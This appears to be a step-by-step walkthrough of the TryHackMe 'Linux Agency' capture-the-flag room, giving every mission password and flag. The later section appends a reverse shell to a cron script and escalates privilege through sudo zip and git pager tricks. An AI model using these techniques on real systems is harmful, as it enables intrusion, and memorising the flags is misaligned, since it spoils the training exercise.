FINISH - Linux Agency
Room Link: https://tryhackme.com/room/linuxagency
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
Kali
nmap -sV -sT -O -p 1-65535 $VICTIM
TCP/21 - SSH
Kali
ssh agent47@$VICTIM
Password: 640509040147
Victim
grep -r "mission" /home/ 2>/dev/null
su mission1
Password: mission1{174dc8f191bcbb161fe25f8a5b58d1f0}
Victim(mission1)
cd /home/mission1
ls
su mission2
Password: mission2{8a1b68bb11e4a35245061656b5b9fa0d}
Victim(mission2)
cd /home/mission2
cat flag.txt
su mission3
Password: mission3{ab1e1ae5cba688340825103f70b0f976}
Victim(mission3)
cd /home/mission3
cat flag.txt
nano flag.txt
su mission4
Password: mission4{264a7eeb920f80b3ee9665fafb7ff92d}
Victim(mission4)
cd /home/mission4/flag
cat flag.txt
su mission5
Password: mission5{bc67906710c3a376bcc7bd25978f62c0}
Victim(mission5)
cd /home/mission4/
cat .flag.txt
su mission6
Password: mission6{1fa67e1adc244b5c6ea711f0c9675fde}
Victim(mission6)
cd /home/mission5/
cat .flag/flag.txt
su mission7
Password: mission7{53fd6b2bad6e85519c7403267225def5}
Victim(mission7)
cd /home/mission7/
cat flag.txt
su mission8
Password: mission8{3bee25ebda7fe7dc0a9d2f481d10577b}Victim(mission8)
cd /
cat flag.txt
su mission9
Password: mission9{ba1069363d182e1c114bef7521c898f5}
Victim(mission9)
cd /home/mission8/
grep "mission10" rockyou.txt
su mission10
Password: mission10{0c9d1c7c5683a1a29b05bb67856524b6}
Victim(mission10)
cd /home/mission9/
grep -r "mission" . 2>/dev/null
su mission11
Password: mission11{db074d9b68f06246944b991d433180c0}
Victim(mission11)
cd /home/mission11/
env
su mission12
Password: mission12{f449a1d33d6edc327354635967f9a720}
Victim(mission12)
cd /home/mission12/
chmod +r flag.txt
cat flag.txt
su mission13
Password: mission13{076124e360406b4c98ecefddd13ddb1f}
Victim(mission13)
cd /home/mission13/
cat flag.txt
echo 'bWlzc2lvbjE0e2Q1OThkZTk1NjM5NTE0Yjk5NDE1MDc2MTdiOWU1NGQyfQo=' | base64 -d
su mission14
Password: mission14{d598de95639514b9941507617b9e54d2}
Victim(mission14)
cd /home/mission14/
cat flag.txt
su mission15
Password: mission15{fc4915d818bfaeff01185c3547f25596}
Victim(mission15)
cd /home/mission15/
cat flag.txt
su mission16
Password: mission16{884417d40033c4c2091b44d7c26a908e}
Victim(mission16)
cd /home/mission16/
chmod flag
./flag
su mission17
Password: mission17{49f8d1348a1053e221dfe7ff99f5cbf4}
Victim(mission17)
cd /home/mission17/
ls
javac flag.java
ls
java flag
su mission18
Password: mission18{f09760649986b489cda320ab5f7917e8}
Victim(mission18)
cd /home/mission18/
ls
ruby flag.rb
su mission19
Password: mission19{a0bf41f56b3ac622d808f7a4385254b7}
Victim(mission19)
cd /home/mission19/
ls
gcc flag.c
ls
./a.out
su mission20
Password: mission20{b0482f9e90c8ad2421bf4353cd8eae1c}
Victim(mission20)
cd /home/mission20/
ls
python flag.py
su mission21
Password: mission21{7de756aabc528b446f6eb38419318f0c}
Victim(mission21)
python -c 'import pty; pty.spawn("/bin/bash")'
su mission22
Password: mission22{24caa74eb0889ed6a2e6984b42d49aaf}
Victim(mission22)
import pty; pty.spawn("/bin/bash")
cd /home/mission22/
ls
cat flag.txt
su mission23
Password: mission23{3710b9cb185282e3f61d2fd8b1b4ffea}
Victim(mission23)
cd /home/mission23/
ls
cat message.txt
grep -r "mission" /var/www/html/ 2>/dev/null
su mission24
Password: mission24{dbaeb06591a7fd6230407df3a947b89c}
Victim(mission24)
cd /home/mission24
ls
./bribeKali
nc -l -p 1234 > bribeVictim(mission24)
nc -w 3 $KALI 1234 < bribeIn Ghidra we can we there is a environment variable called pocket that needs to be set, if it's set to money it will run the if statement to show the flag
Kali
ghidra
Victim(mission24)
export pocket=money
./bribe
su mission25
Password: mission25{61b93637881c87c71f220033b22a921b}
Most commands don't work, I couldn't ls or cat files
Victim(mission25)
cd /home/mission25
echo "$(</home/mission25/flag.txt )"
exit
su mission26
Password: mission26{cb6ce977c16c57f509e9f8462a120f00}
Victim(mission26)
cd /home/mission26
ls
Kali
nc -l -p 1234 > flag.jpgVictim(mission26)
nc -w 3 $KALI 1234 < flag.jpgKali
nc -l -p 1234 > flag.jpg
steghide extract -sf flag.jpg 
Victim(mission26)
su mission27
Password: mission27{444d29b932124a48e7dddc0595788f4d}Victim(mission27)
cd /home/mission27
ls
gzip -d flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
su mission28
Password: mission28{03556f8ca983ef4dc26d2055aef9770f}
Victim(mission28)
Dir.entries("/home/mission28/")
File.read("/home/mission28/txt.galf").reverse
exit
su mission29
Password: mission29{8192b05d8b12632586e25be74da2fff1}
Victim(mission29)
cd /home/mission29/bludit
grep -r "mission" . 2>/dev/null
su mission30
Password: mission30{d25b4c9fac38411d2fcb4796171bda6e}
Victim(mission30)
ls -lah /home/mission30/Escalator/
cd /home/mission30/Escalator/
git log --pretty=oneline
su viktor
Password: viktor{b52c60124c0f8f85fe647021122b3d9a}
Victim(viktor)
cat /etc/crontab
su viktor
Password:
Kali
nc -lvnp 1337Add reverse shell to script, I kept having to check and readd until dalia ran the script as there is another cronjob that resets the script
Victim(viktor)
echo "sh -i >& /dev/tcp/10.10.171.224/1337 0>&1" >> /opt/scripts/47.sh
cat /opt/scripts/47.sh
Victim(dalia)
ls
cat flag.txt
Get autocomplete
python -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgDalia can run the zip command as silvio
Exploit: https://gtfobins.github.io/gtfobins/zip/
Victim(dalia)
sudo -l
TF=$(mktemp -u)
sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
rm $TF
Victim(silvia)
python -c 'import pty; pty.spawn("/bin/bash")'
sudo -l
Exploit:
Victim(silvia)
sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
whoami
python -c 'import pty; pty.spawn("/bin/bash")'
Last updated